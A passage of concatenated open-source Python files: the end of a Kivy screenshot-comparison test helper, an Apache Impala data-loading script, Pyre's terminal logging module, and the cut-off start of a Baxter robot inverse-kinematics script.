fd, tmpfn = mkstemp(suffix='.png', prefix='kivyunit-')
close(fd)
unlink(tmpfn)
# get a filename for the current unit test
self.test_counter += 1
test_uid = '%s-%d.png' % (
'_'.join(self.id().split('.')[-2:]),
self.test_counter)
# capture the screen
log.info('Capturing screenshot for %s' % test_uid)
tmpfn = window.screenshot(tmpfn)
log.info('Capture saved at %s' % tmpfn)
# search the file to compare to
reffn = join(self.results_dir, test_uid)
log.info('Compare with %s' % reffn)
# get sourcecode
import inspect
frame = inspect.getouterframes(inspect.currentframe())[6]
sourcecodetab, line = inspect.getsourcelines(frame[0])
line = frame[2] - line
currentline = sourcecodetab[line]
sourcecodetab[line] = '<span style="color: red;">%s</span>' % (
currentline)
sourcecode = ''.join(sourcecodetab)
sourcecodetab[line] = '>>>>>>>>\n%s<<<<<<<<\n' % currentline
sourcecodeask = ''.join(sourcecodetab)
if not exists(reffn):
log.info('No image reference, move %s as ref ?' % test_uid)
if self.interactive_ask_ref(sourcecodeask, tmpfn, self.id()):
move(tmpfn, reffn)
tmpfn = reffn
log.info('Image used as reference')
match = True
else:
log.info('Image discarded')
else:
from kivy.core.image import Image as CoreImage
s1 = CoreImage(tmpfn, keep_data=True)
sd1 = s1.image._data[0].data
s2 = CoreImage(reffn, keep_data=True)
sd2 = s2.image._data[0].data
if sd1 != sd2:
log.critical(
'%s at render() #%d, images are different.' % (
self.id(), self.test_counter))
if self.interactive_ask_diff(sourcecodeask,
tmpfn, reffn, self.id()):
log.critical('user ask to use it as ref.')
move(tmpfn, reffn)
tmpfn = reffn
match = True
else:
self.test_failed = True
else:
match = True
# generate html
from os.path import join, dirname, exists, basename
from os import mkdir
build_dir = join(dirname(__file__), 'build')
if not exists(build_dir):
mkdir(build_dir)
copy(reffn, join(build_dir, 'ref_%s' % basename(reffn)))
if tmpfn != reffn:
copy(tmpfn, join(build_dir, 'test_%s' % basename(reffn)))
with open(join(build_dir, 'index.html'), 'at') as fd:
color = '#ffdddd' if not match else '#ffffff'
fd.write('<div style="background-color: %s">' % color)
fd.write('<h2>%s #%d</h2>' % (self.id(), self.test_counter))
fd.write('<table><tr><th>Reference</th>'
'<th>Test</th>'
'<th>Comment</th>')
fd.write('<tr><td><img src="ref_%s"/></td>' %
basename(reffn))
if tmpfn != reffn:
fd.write('<td><img src="test_%s"/></td>' %
basename(reffn))
else:
fd.write('<td>First time, no comparison.</td>')
fd.write('<td><pre>%s</pre></td>' % sourcecode)
fd.write('</table></div>')
finally:
try:
if reffn != tmpfn:
unlink(tmpfn)
except:
pass
EventLoop.stop()
def tearDown(self, fake=False):
'''When the test is finished, stop the application, and unbind our
current flip callback.
'''
from kivy.base import stopTouchApp
from kivy.core.window import Window
from kivy.clock import Clock
Window.unbind(on_flip=self.on_window_flip)
stopTouchApp()
if not fake and self.test_failed:
self.assertTrue(False)
super(GraphicUnitTest, self).tearDown()
def interactive_ask_ref(self, code, imagefn, testid):
from os import environ
if 'UNITTEST_INTERACTIVE' not in environ:
return True
from tkinter import Tk, Label, LEFT, RIGHT, BOTTOM, Button
from PIL import Image, ImageTk
self.retval = False
root = Tk()
def do_close():
root.destroy()
def do_yes():
self.retval = True
do_close()
image = Image.open(imagefn)
photo = ImageTk.PhotoImage(image)
Label(root, text='The test %s\nhave no reference.' % testid).pack()
Label(root, text='Use this image as a reference ?').pack()
Label(root, text=code, justify=LEFT).pack(side=RIGHT)
Label(root, image=photo).pack(side=LEFT)
Button(root, text='Use as reference', command=do_yes).pack(side=BOTTOM)
Button(root, text='Discard', command=do_close).pack(side=BOTTOM)
root.mainloop()
return self.retval
def interactive_ask_diff(self, code, tmpfn, reffn, testid):
from os import environ
if 'UNITTEST_INTERACTIVE' not in environ:
return False
from tkinter import Tk, Label, LEFT, RIGHT, BOTTOM, Button
from PIL import Image, ImageTk
self.retval = False
root = Tk()
def do_close():
root.destroy()
def do_yes():
self.retval = True
do_close()
phototmp = ImageTk.PhotoImage(Image.open(tmpfn))
photoref = ImageTk.PhotoImage(Image.open(reffn))
Label(root, text='The test %s\nhave generated an different'
'image as the reference one..' % testid).pack()
Label(root, text='Which one is good ?').pack()
Label(root, text=code, justify=LEFT).pack(side=RIGHT)
Label(root, image=phototmp).pack(side=RIGHT)
Label(root, image=photoref).pack(side=LEFT)
Button(root, text='Use the new image -->',
command=do_yes).pack(side=BOTTOM)
Button(root, text='<-- Use the reference',
command=do_close).pack(side=BOTTOM)
root.mainloop()
return self.retval
def advance_frames(self, count):
'''Render the new frames and:
* tick the Clock
* dispatch input from all registered providers
* flush all the canvas operations
* redraw Window canvas if necessary
'''
from kivy.base import EventLoop
for i in range(count):
EventLoop.idle()
class UnitTestTouch(MotionEvent):
'''Custom MotionEvent representing a single touch. Similar to `on_touch_*`
methods from the Widget class, this one introduces:
* touch_down
* touch_move
* touch_up
Create a new touch with::
touch = UnitTestTouch(x, y)
then you press it on the default position with::
touch.touch_down()
or move it or even release with these simple calls::
touch.touch_move(new_x, new_y)
touch.touch_up()
'''
def __init__(self, x, y):
'''Create a MotionEvent instance with X and Y of the first
position a touch is at.
'''
from kivy.base import EventLoop
self.eventloop = EventLoop
win = EventLoop.window
super(UnitTestTouch, self).__init__(
# device, (tuio) id, args
self.__class__.__name__, 99, {
"x": x / (win.width - 1.0),
"y": y / (win.height - 1.0),
}
)
def touch_down(self, *args):
self.eventloop.post_dispatch_input("begin", self)
def touch_move(self, x, y):
win = self.eventloop.window
self.move({
"x": x / (win.width - 1.0),
"y": y / (win.height - 1.0)
})
self.eventloop.post_dispatch_input("update", self)
def touch_up(self, *args):
self.eventloop.post_dispatch_input("end", self)
def depack(self, args):
# set MotionEvent to touch
self.is_touch = True
# set sx/sy properties to ratio (e.g. X / win.width)
self.sx = args['x']
self.sy = args['y']
# set profile to accept x, y and pos properties
self.profile = ['pos']
# run depack after we set the values
super(UnitTestTouch, self).depack(args)
class UTMotionEvent(MotionEvent):
def depack(self, args):
self.is_touch = True
self.sx = args['x']
self.sy = args['y']
self.profile = ['pos']
super(UTMotionEvent, self).depack(args)
def async_run(func=None, app_cls_func=None):
def inner_func(func):
if 'mock' == cgl_get_backend_name():
return pytest.mark.skip(
reason='Skipping because gl backend is set to mock')(func)
if sys.version_info[0] < 3 or sys.version_info[1] <= 5:
return pytest.mark.skip(
reason='Skipping because graphics tests are not supported on '
'py3.5, only on py3.6+')(func)
if app_cls_func is not None:
func = pytest.mark.parametrize(
"kivy_app", [[app_cls_func], ], indirect=True)(func)
if kivy_eventloop == 'asyncio':
try:
import pytest_asyncio
return pytest.mark.asyncio(func)
except ImportError:
return pytest.mark.skip(
reason='KIVY_EVENTLOOP == "asyncio" but '
'"pytest-asyncio" is not installed')(func)
elif kivy_eventloop == 'trio':
try:
import trio
from pytest_trio import trio_fixture
func._force_trio_fixture = True
return func
except ImportError:
return pytest.mark.skip(
reason='KIVY_EVENTLOOP == "trio" but '
'"pytest-trio" is not installed')(func)
else:
return pytest.mark.skip(
reason='KIVY_EVENTLOOP must be set to either of "asyncio" or '
'"trio" to run async tests')(func)
if func is None:
return inner_func
return inner_func(func)
|
load-data.py
|
#!/usr/bin/env impala-python
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
# This script is used to load the proper datasets for the specified workloads. It loads
# all data via Hive except for parquet data which needs to be loaded via Impala.
# Most ddl commands are executed by Impala.
import collections
import getpass
import logging
import os
import re
import sqlparse
import subprocess
import sys
import tempfile
import time
import traceback
from itertools import product
from optparse import OptionParser
from Queue import Queue
from tests.beeswax.impala_beeswax import *
from threading import Thread
logging.basicConfig()
LOG = logging.getLogger('load-data.py')
LOG.setLevel(logging.DEBUG)
parser = OptionParser()
parser.add_option("-e", "--exploration_strategy", dest="exploration_strategy",
default="core",
help="The exploration strategy for schema gen: 'core', "\
"'pairwise', or 'exhaustive'")
parser.add_option("--hive_warehouse_dir", dest="hive_warehouse_dir",
default="/test-warehouse",
help="The HDFS path to the base Hive test warehouse directory")
parser.add_option("-w", "--workloads", dest="workloads",
help="Comma-separated list of workloads to load data for. If 'all' is "\
"specified then data for all workloads is loaded.")
parser.add_option("-s", "--scale_factor", dest="scale_factor", default="",
help="An optional scale factor to generate the schema for")
parser.add_option("-f", "--force_reload", dest="force_reload", action="store_true",
default=False, help='Skips HDFS exists check and reloads all tables')
parser.add_option("--impalad", dest="impalad", default="localhost:21000",
help="Impala daemon to connect to")
parser.add_option("--hive_hs2_hostport", dest="hive_hs2_hostport",
default="localhost:11050",
help="HS2 host:Port to issue Hive queries against using beeline")
parser.add_option("--table_names", dest="table_names", default=None,
help="Only load the specified tables - specified as a comma-seperated "\
"list of base table names")
parser.add_option("--table_formats", dest="table_formats", default=None,
help="Override the test vectors and load using the specified table "\
"formats. Ex. --table_formats=seq/snap/block,text/none")
parser.add_option("--hdfs_namenode", dest="hdfs_namenode", default="localhost:20500",
help="HDFS name node for Avro schema URLs, default localhost:20500")
parser.add_option("--workload_dir", dest="workload_dir",
default=os.environ['IMPALA_WORKLOAD_DIR'],
help="Directory that contains Impala workloads")
parser.add_option("--dataset_dir", dest="dataset_dir",
default=os.environ['IMPALA_DATASET_DIR'],
help="Directory that contains Impala datasets")
parser.add_option("--use_kerberos", action="store_true", default=False,
help="Load data on a kerberized cluster.")
parser.add_option("--principal", default=None, dest="principal",
help="Kerberos service principal, required if --use_kerberos is set")
options, args = parser.parse_args()
SQL_OUTPUT_DIR = os.environ['IMPALA_DATA_LOADING_SQL_DIR']
WORKLOAD_DIR = options.workload_dir
DATASET_DIR = options.dataset_dir
TESTDATA_BIN_DIR = os.path.join(os.environ['IMPALA_HOME'], 'testdata/bin')
AVRO_SCHEMA_DIR = "avro_schemas"
GENERATE_SCHEMA_CMD = "generate-schema-statements.py --exploration_strategy=%s "\
"--workload=%s --scale_factor=%s --verbose"
# Load data using Hive's beeline because the Hive shell has regressed (HIVE-5515).
# The Hive shell is stateful, meaning that certain series of actions lead to problems.
# Examples of problems due to the statefullness of the Hive shell:
# - Creating an HBase table changes the replication factor to 1 for subsequent LOADs.
# - INSERTs into an HBase table fail if they are the first stmt executed in a session.
# However, beeline itself also has bugs. For example, inserting a NULL literal into
# a string-typed column leads to an NPE. We work around these problems by using LOAD from
# a datafile instead of doing INSERTs.
HIVE_CMD = os.path.join(os.environ['HIVE_HOME'], 'bin/beeline')
hive_auth = "auth=none"
if options.use_kerberos:
if not options.principal:
print "--principal is required when --use_kerberos is specified"
exit(1)
hive_auth = "principal=" + options.principal
HIVE_ARGS = '-n %s -u "jdbc:hive2://%s/default;%s" --verbose=true'\
% (getpass.getuser(), options.hive_hs2_hostport, hive_auth)
HADOOP_CMD = os.path.join(os.environ['HADOOP_HOME'], 'bin/hadoop')
def available_workloads(workload_dir):
return [subdir for subdir in os.listdir(workload_dir)
if os.path.isdir(os.path.join(workload_dir, subdir))]
def validate_workloads(all_workloads, workloads):
for workload in workloads:
if workload not in all_workloads:
print 'Workload \'%s\' not found in workload directory' % workload
print 'Available workloads: ' + ', '.join(all_workloads)
sys.exit(1)
def exec_cmd(cmd, error_msg, exit_on_error=True):
ret_val = -1
try:
ret_val = subprocess.call(cmd, shell=True)
except Exception as e:
error_msg = "%s: %s" % (error_msg, str(e))
finally:
if ret_val != 0:
print error_msg
if exit_on_error: sys.exit(ret_val)
return ret_val
def exec_hive_query_from_file(file_name):
if not os.path.exists(file_name): return
hive_cmd = "%s %s -f %s" % (HIVE_CMD, HIVE_ARGS, file_name)
print 'Executing Hive Command: %s' % hive_cmd
exec_cmd(hive_cmd, 'Error executing file from Hive: ' + file_name)
def exec_hbase_query_from_file(file_name):
if not os.path.exists(file_name): return
hbase_cmd = "hbase shell %s" % file_name
print 'Executing HBase Command: %s' % hbase_cmd
exec_cmd(hbase_cmd, 'Error executing hbase create commands')
# KERBEROS TODO: fails when kerberized and impalad principal isn't "impala"
def exec_impala_query_from_file(file_name):
"""Execute each query in an Impala query file individually"""
is_success = True
impala_client = ImpalaBeeswaxClient(options.impalad, use_kerberos=options.use_kerberos)
try:
impala_client.connect()
with open(file_name, 'r+') as query_file:
queries = sqlparse.split(query_file.read())
for query in queries:
query = sqlparse.format(query.rstrip(';'), strip_comments=True)
print '(%s):\n%s\n' % (file_name, query.strip())
if query.strip() != "":
result = impala_client.execute(query)
except Exception as e:
print "Data Loading from Impala failed with error: %s" % str(e)
traceback.print_exc()
is_success = False
finally:
impala_client.close_connection()
return is_success
def exec_bash_script(file_name):
bash_cmd = "bash %s" % file_name
print 'Executing Bash Command: ' + bash_cmd
exec_cmd(bash_cmd, 'Error bash script: ' + file_name)
def run_dataset_preload(dataset):
"""Execute a preload script if present in dataset directory. E.g. to generate data
before loading"""
dataset_preload_script = os.path.join(DATASET_DIR, dataset, "preload")
if os.path.exists(dataset_preload_script):
print("Running preload script for " + dataset)
if options.scale_factor > 1:
dataset_preload_script += " " + str(options.scale_factor)
exec_cmd(dataset_preload_script, "Error executing preload script for " + dataset,
exit_on_error=True)
def generate_schema_statements(workload):
generate_cmd = GENERATE_SCHEMA_CMD % (options.exploration_strategy, workload,
options.scale_factor)
if options.table_names:
generate_cmd += " --table_names=%s" % options.table_names
if options.force_reload:
generate_cmd += " --force_reload"
if options.table_formats:
generate_cmd += " --table_formats=%s" % options.table_formats
if options.hive_warehouse_dir is not None:
generate_cmd += " --hive_warehouse_dir=%s" % options.hive_warehouse_dir
if options.hdfs_namenode is not None:
generate_cmd += " --hdfs_namenode=%s" % options.hdfs_namenode
generate_cmd += " --backend=%s" % options.impalad
print 'Executing Generate Schema Command: ' + generate_cmd
schema_cmd = os.path.join(TESTDATA_BIN_DIR, generate_cmd)
error_msg = 'Error generating schema statements for workload: ' + workload
exec_cmd(schema_cmd, error_msg)
def get_dataset_for_workload(workload):
dimension_file_name = os.path.join(WORKLOAD_DIR, workload,
'%s_dimensions.csv' % workload)
if not os.path.isfile(dimension_file_name):
print 'Dimension file not found: ' + dimension_file_name
sys.exit(1)
with open(dimension_file_name, 'rb') as input_file:
match = re.search('dataset:\s*([\w\-\.]+)', input_file.read())
if match:
return match.group(1)
else:
print 'Dimension file does not contain dataset for workload \'%s\'' % (workload)
sys.exit(1)
def copy_avro_schemas_to_hdfs(schemas_dir):
"""Recursively copies all of schemas_dir to the test warehouse."""
if not os.path.exists(schemas_dir):
print 'Avro schema dir (%s) does not exist. Skipping copy to HDFS.' % schemas_dir
return
exec_hadoop_fs_cmd("-mkdir -p " + options.hive_warehouse_dir)
exec_hadoop_fs_cmd("-put -f %s %s/" % (schemas_dir, options.hive_warehouse_dir))
def exec_hadoop_fs_cmd(args, exit_on_error=True):
cmd = "%s fs %s" % (HADOOP_CMD, args)
print "Executing Hadoop command: " + cmd
exec_cmd(cmd, "Error executing Hadoop command, exiting",
exit_on_error=exit_on_error)
def exec_impala_query_from_file_parallel(query_files):
# Get the name of the query file that loads the base tables, if it exists.
# TODO: Find a better way to detect the file that loads the base tables.
create_base_table_file = next((q for q in query_files if 'text' in q), None)
if create_base_table_file:
is_success = exec_impala_query_from_file(create_base_table_file)
query_files.remove(create_base_table_file)
# If loading the base tables failed, exit with a non zero error code.
if not is_success: sys.exit(1)
if not query_files: return
threads = []
result_queue = Queue()
for query_file in query_files:
thread = Thread(target=lambda x: result_queue.put(exec_impala_query_from_file(x)),
args=[query_file])
thread.daemon = True
threads.append(thread)
thread.start()
# Keep looping until the number of results retrieved is the same as the number of
# threads spawned, or until a data loading query fails. result_queue.get() will
# block until a result is available in the queue.
num_fetched_results = 0
while num_fetched_results < len(threads):
success = result_queue.get()
num_fetched_results += 1
if not success: sys.exit(1)
# There is a small window where a thread may still be alive even if all the threads have
# finished putting their results in the queue.
for thread in threads: thread.join()
def invalidate_impala_metadata():
print "Invalidating Metadata"
impala_client = ImpalaBeeswaxClient(options.impalad, use_kerberos=options.use_kerberos)
impala_client.connect()
try:
impala_client.execute('invalidate metadata')
finally:
impala_client.close_connection()
if __name__ == "__main__":
# Having the actual command line at the top of each data-load-* log can help
# when debugging dataload issues.
#
LOG.debug(' '.join(sys.argv))
all_workloads = available_workloads(WORKLOAD_DIR)
workloads = []
if options.workloads is None:
print "At least one workload name must be specified."
parser.print_help()
sys.exit(1)
elif options.workloads == 'all':
print 'Loading data for all workloads.'
workloads = all_workloads
else:
workloads = options.workloads.split(",")
validate_workloads(all_workloads, workloads)
print 'Starting data load for the following workloads: ' + ', '.join(workloads)
loading_time_map = collections.defaultdict(float)
for workload in workloads:
start_time = time.time()
dataset = get_dataset_for_workload(workload)
run_dataset_preload(dataset)
generate_schema_statements(workload)
sql_dir = os.path.join(SQL_OUTPUT_DIR, dataset)
assert os.path.isdir(sql_dir),\
("Could not find the generated SQL files for loading dataset '%s'.\
\nExpected to find the SQL files in: %s" % (dataset, sql_dir))
os.chdir(os.path.join(SQL_OUTPUT_DIR, dataset))
copy_avro_schemas_to_hdfs(AVRO_SCHEMA_DIR)
dataset_dir_contents = os.listdir(os.getcwd())
load_file_substr = "%s-%s" % (workload, options.exploration_strategy)
# Data loading with Impala is done in parallel, each file format has a separate query
# file.
create_filename = '%s-impala-generated' % load_file_substr
load_filename = '%s-impala-load-generated' % load_file_substr
impala_create_files = [f for f in dataset_dir_contents if create_filename in f]
impala_load_files = [f for f in dataset_dir_contents if load_filename in f]
# Execute the data loading scripts.
# Creating tables in Impala has no dependencies, so we execute them first.
# HBase table inserts are done via hive, so the hbase tables need to be created before
# running the hive script. Some of the Impala inserts depend on hive tables,
# so they're done at the end. Finally, the Hbase Tables that have been filled with data
# need to be flushed.
exec_impala_query_from_file_parallel(impala_create_files)
exec_hbase_query_from_file('load-%s-hbase-generated.create' % load_file_substr)
exec_hive_query_from_file('load-%s-hive-generated.sql' % load_file_substr)
exec_hbase_query_from_file('post-load-%s-hbase-generated.sql' % load_file_substr)
if impala_load_files: invalidate_impala_metadata()
exec_impala_query_from_file_parallel(impala_load_files)
loading_time_map[workload] = time.time() - start_time
invalidate_impala_metadata()
total_time = 0.0
for workload, load_time in loading_time_map.iteritems():
total_time += load_time
print 'Data loading for workload \'%s\' completed in: %.2fs'\
% (workload, load_time)
print 'Total load time: %.2fs\n' % total_time
|
log.py
|
# Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import contextlib
import copy
import io
import logging
import logging.handlers
import os
import re
import subprocess
import sys
import threading
import time
from pathlib import Path
from types import TracebackType
from typing import Generator, Iterable, Optional, Pattern, Sequence
import click
PERFORMANCE: int = 15
PROMPT: int = 50
SUCCESS: int = 60
LOG: logging.Logger = logging.getLogger(__name__)
stdout: io.StringIO = io.StringIO(newline="")
__handler: Optional["TimedStreamHandler"] = None
class Color:
YELLOW: str = "\033[33m"
RED: str = "\033[31m"
GREEN: str = "\033[32m"
class Format:
BOLD: str = "\033[1m"
CLEAR_LINE: str = "\x1b[0G\x1b[K"
CLEAR: str = "\033[0m"
TRUNCATE_OVERFLOW: str = "\033[?7l"
WRAP_OVERFLOW: str = "\033[?7h"
NEWLINE: str = "\n"
CURSOR_UP_LINE: str = "\x1b[1A"
HIDE_CURSOR: str = "\x1b[?25l"
SHOW_CURSOR: str = "\x1b[?25h"
class Character:
LAMBDA: str = "ƛ"
class SectionFormatter(logging.Formatter):
def __init__(self) -> None:
super(SectionFormatter, self).__init__(
"%(asctime)s [PID %(process)d] %(levelname)s %(message)s"
)
def format(self, record: logging.LogRecord) -> str:
formatted = super(SectionFormatter, self).format(record)
return re.sub(r"DEBUG \[(.*)\]", r"\1", formatted)
class TimedStreamHandler(logging.StreamHandler):
THRESHOLD: float = 0.5
LINE_BREAKING_LEVELS: Sequence[str] = ["ERROR", "WARNING", "SUCCESS"]
_terminate: bool = False
_last_update: float = 0.0
def __init__(self) -> None:
super(TimedStreamHandler, self).__init__()
self.setFormatter(logging.Formatter("%(message)s"))
self.terminator: str = ""
self.setLevel(logging.INFO)
self._record: Optional[logging.LogRecord] = None
self._active_lines: int = 0
# Preamble preparing terminal.
click.echo(
Format.NEWLINE
+ Format.CLEAR_LINE
+ Format.CURSOR_UP_LINE
+ Format.HIDE_CURSOR,
file=sys.stderr,
nl=False,
)
thread = threading.Thread(target=self._thread)
thread.daemon = True
thread.start()
def clear_lines(self) -> str:
if self._active_lines == 0:
return ""
return Format.CLEAR_LINE + "".join(
[
Format.CURSOR_UP_LINE + Format.CLEAR_LINE
for n in range(self._active_lines - 1)
]
)
def emit(self, record: logging.LogRecord, age: Optional[float] = None) -> None:
suffix = ""
color: Optional[str] = None
message = record.msg
active_lines = message.count("\n") + 1
truncate = Format.TRUNCATE_OVERFLOW
if record.levelname in self.LINE_BREAKING_LEVELS:
message += "\n"
if record.levelname == "ERROR":
color = "red"
self._record = None
active_lines = 0
truncate = Format.WRAP_OVERFLOW
elif record.levelname == "WARNING":
color = "yellow"
self._record = None
active_lines = 0
truncate = Format.WRAP_OVERFLOW
elif record.levelname == "PROMPT":
color = "yellow"
self._record = None
active_lines = 0
truncate = Format.WRAP_OVERFLOW
elif record.levelname == "SUCCESS":
self._record = None
active_lines = 0
truncate = Format.WRAP_OVERFLOW
elif age:
if age > 10:
color = "yellow"
if age > 30:
color = "red"
suffix = click.style(" [{:.1f}s]".format(age), fg=color)
else:
self._record = record
self._last_update = time.time()
prompt = click.style(f"{Character.LAMBDA}", fg=color)
new_message = f"{self.clear_lines()}{prompt} {truncate}{message}{suffix}"
timed_record = copy.copy(record)
timed_record.msg = (
f"{click.unstyle(new_message)}\n"
# pyre-ignore[16]: Missing typeshed stub for this API
if click.utils.should_strip_ansi(stream=sys.stderr)
else new_message
)
self._active_lines = active_lines
super(TimedStreamHandler, self).emit(timed_record)
def _thread(self) -> None:
while not self._terminate:
record = self._record
if record:
age = time.time() - self._last_update
if age > self.THRESHOLD:
self.emit(record, age)
time.sleep(0.1)
def terminate(self) -> None:
self._terminate = True
if self._active_lines > 0:
click.echo(self.clear_lines(), file=sys.stderr, nl=False)
self._active_lines = 0
# Reset terminal.
click.echo(Format.WRAP_OVERFLOW + Format.SHOW_CURSOR, file=sys.stderr, nl=False)
sys.stderr.flush()
def initialize(noninteractive: bool) -> None:
global __handler
if __handler:
LOG.debug("Log handler already exists, skipping initialization.")
return
if noninteractive:
stream_handler = logging.StreamHandler()
stream_handler.setFormatter(SectionFormatter())
stream_handler.setLevel(logging.DEBUG)
__handler = None
else:
stream_handler = TimedStreamHandler()
__handler = stream_handler
logging.addLevelName(PERFORMANCE, "PERFORMANCE")
logging.addLevelName(PROMPT, "PROMPT")
logging.addLevelName(SUCCESS, "SUCCESS")
logging.basicConfig(level=logging.DEBUG, handlers=[stream_handler])
def start_logging_to_directory(noninteractive: bool, log_directory: str) -> None:
if not noninteractive and log_directory is not None:
if not os.path.exists(log_directory):
os.makedirs(log_directory)
handler = logging.handlers.RotatingFileHandler(
os.path.join(log_directory, "pyre.stderr"),
mode="a",
# Keep at most 5 log files on disk
backupCount=4,
# Limit the size of each log file to 10MB
maxBytes=10 * 1000 * 1000,
)
handler.setFormatter(SectionFormatter())
handler.setLevel(logging.DEBUG)
logger = logging.getLogger()
logger.addHandler(handler)
def cleanup() -> None:
global __handler
handler = __handler
if handler:
handler.terminate()
__handler = None
output = stdout.getvalue()
if output:
click.echo(output, nl=False)
if not output.endswith("\n"):
click.echo()
@contextlib.contextmanager
def configured_logger(noninteractive: bool) -> Generator[None, None, None]:
try:
initialize(noninteractive)
yield
finally:
cleanup()
@contextlib.contextmanager
def file_tailer(file_path: Path) -> Generator[Iterable[str], None, None]:
"""
This function yields a stream of string generated by following the last
part of the given file. In other words, the returned stream behaves roughtly
the same as `tail -F`: If the file being watched is left untouched, invoking
`next` on the returned stream will block indefinitely. If the file being
watched gets a line appended to the end of it, invoking `next` on the returned
stream will return the appended line. Leaving the context manager will cause
the returned stream to stop iteration next time `next` is invoked.
This API is intended to be used along with `StreamLogger` to concurrently
forward the content of a log file to the terminal in the background:
```
with file_tailer(log_file) as log_stream:
with StreamLogger(log_stream) as logger:
# Main thread logic happens here
...
logger.join()
```
"""
with subprocess.Popen(
["tail", "-F", "-n", "0", str(file_path)],
stdout=subprocess.PIPE,
stderr=subprocess.DEVNULL,
universal_newlines=True,
) as tail:
try:
stdout = tail.stdout
if stdout is None:
raise RuntimeError(
"subprocess.Popen failed to set up a pipe for stdout"
)
yield stdout
finally:
tail.terminate()
class StreamLogger:
_should_stop_reading_stream = False
_current_section: Optional[str]
_server_log_pattern: Pattern[str] = re.compile(
r"\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2} (\w+) (.*)"
)
def __init__(self, stream: Iterable[str]) -> None:
self._reader = threading.Thread(target=self._read_stream, args=(stream,))
self._reader.daemon = True
self._current_section = None
def join(self) -> None:
self._reader.join()
def _log_server_stderr_message(self, server_message: str) -> None:
line = server_message.rstrip()
match = self._server_log_pattern.match(line)
if match:
section = match.groups()[0]
message = match.groups()[1]
self._current_section = section
else:
section = self._current_section
message = line
if section == "ERROR":
LOG.error(message)
elif section == "INFO":
LOG.info(message)
elif section == "DUMP":
LOG.warning(message)
elif section == "WARNING":
LOG.warning(message)
elif section == "PROGRESS":
LOG.info(message)
elif section == "PARSER":
LOG.error(message)
elif section is not None:
LOG.debug("[%s] %s", section, message)
else:
LOG.debug(line)
def _read_stream(self, stream: Iterable[str]) -> None:
try:
for line in stream:
if self._should_stop_reading_stream:
return
self._log_server_stderr_message(line)
except Exception:
pass
def __enter__(self) -> "StreamLogger":
self._should_stop_reading_stream = False
self._reader.start()
return self
def __exit__(
self,
_type: Optional[BaseException],
_value: Optional[BaseException],
_traceback: Optional[TracebackType],
) -> None:
self._should_stop_reading_stream = True
def get_yes_no_input(prompt: str) -> bool:
choice = get_input(prompt, suffix=" [Y/n] ")
return choice.lower() in ["", "y", "ye", "yes"]
def get_optional_input(prompt: str, default: str) -> str:
result = get_input(prompt, suffix=" (Default: `{}`): ".format(default))
if result == "":
return default
return result
def get_input(prompt: str, suffix: str = "") -> str:
LOG.log(PROMPT, prompt + suffix)
return input().strip()
|
trajectory_ik.py
|
#!/usr/bin/env python
# Copyright (c) 2013-2015, Rethink Robotics
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# 3. Neither the name of the Rethink Robotics nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
import argparse
import roslib
import rospy
import threading
import numpy
import baxter_interface
import sys
import signal
import numpy as np
import copy
import math
from geometry_msgs.msg import (
PoseStamped,
Pose,
Point,
Quaternion,
)
from ar_track_alvar_msgs.msg import (
AlvarMarkers)
from tf.transformations import *
from baxter_examples import IKSolver
from baxter_interface import CHECK_VERSION
def signal_handler(signal, frame):
poseToJoints._end_thread = True
sys.exit(0)
signal.signal(signal.SIGINT, signal_handler)
class PoseToJoints(object):
def __init__(self, filename, limb):
print("Initializing node... ")
rospy.init_node("rsdkPoseToJoints")
print("Getting robot state... ")
rs = baxter_interface.RobotEnable(CHECK_VERSION)
print("Enabling robot... ")
rs.enable()
self._filename = filename
self._start_time = rospy.get_time()
self._limb = limb
self._limb_left = baxter_interface.Limb("left")
self._limb_right = baxter_interface.Limb("right")
self._left_names = self._limb_left.joint_names()
self._right_names = self._limb_right.joint_names()
self._gripper_left = baxter_interface.Gripper('left', CHECK_VERSION)
self._gripper_right = baxter_interface.Gripper('right', CHECK_VERSION)
self._gripper_left_status = 1
self._gripper_right_status = 1
self._rate = rospy.Rate(200)
self._execution_timeout = 1000 # miliseconds
self._execution_start = rospy.get_time() # miliseconds
self._left_ik_solver = IKSolver('left')
self._right_ik_solver = IKSolver('right')
self._initial_right_pose = Pose()
self._initial_left_pose = Pose()
self._end_thread = False
self.thread = threading.Thread(target=self._update_thread)
self.thread.start()
if(limb == 'left' or limb == 'both'):
rospy.Subscriber("/robot/limb/left/endpoint_state", PoseStamped, self.left_end_callback)
if(limb == 'right' or limb == 'both'):
